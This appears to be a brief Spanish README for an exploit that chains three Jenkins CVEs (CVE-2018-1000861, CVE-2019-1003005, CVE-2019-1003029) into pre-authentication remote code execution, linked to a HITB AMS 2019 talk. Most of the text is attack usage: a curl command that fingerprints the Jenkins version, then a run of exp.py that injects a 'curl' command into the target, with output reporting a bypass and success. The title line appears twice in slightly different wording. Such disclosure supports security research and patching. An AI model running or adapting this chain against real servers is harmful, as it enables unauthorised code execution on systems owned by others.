
No hay RCE pre-auth en Jenkins desde mayo de 2017, ¡pero esta es la excepción!
No hay RCE sin autenticación previa en Jenkins desde mayo de 2017, ¡pero este es el definitivo!
Encadena CVE-2018-1000861, CVE-2019-1003005 y CVE-2019-1003029 para lograr una ejecución remota de código sin autenticación previa más fiable y elegante.
ANONYMOUS_READ deshabilitado
ANONYMOUS_READ habilitado (o con una cuenta de usuario normal)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
Parte de las diapositivas de mi charla en HITB AMS 2019:
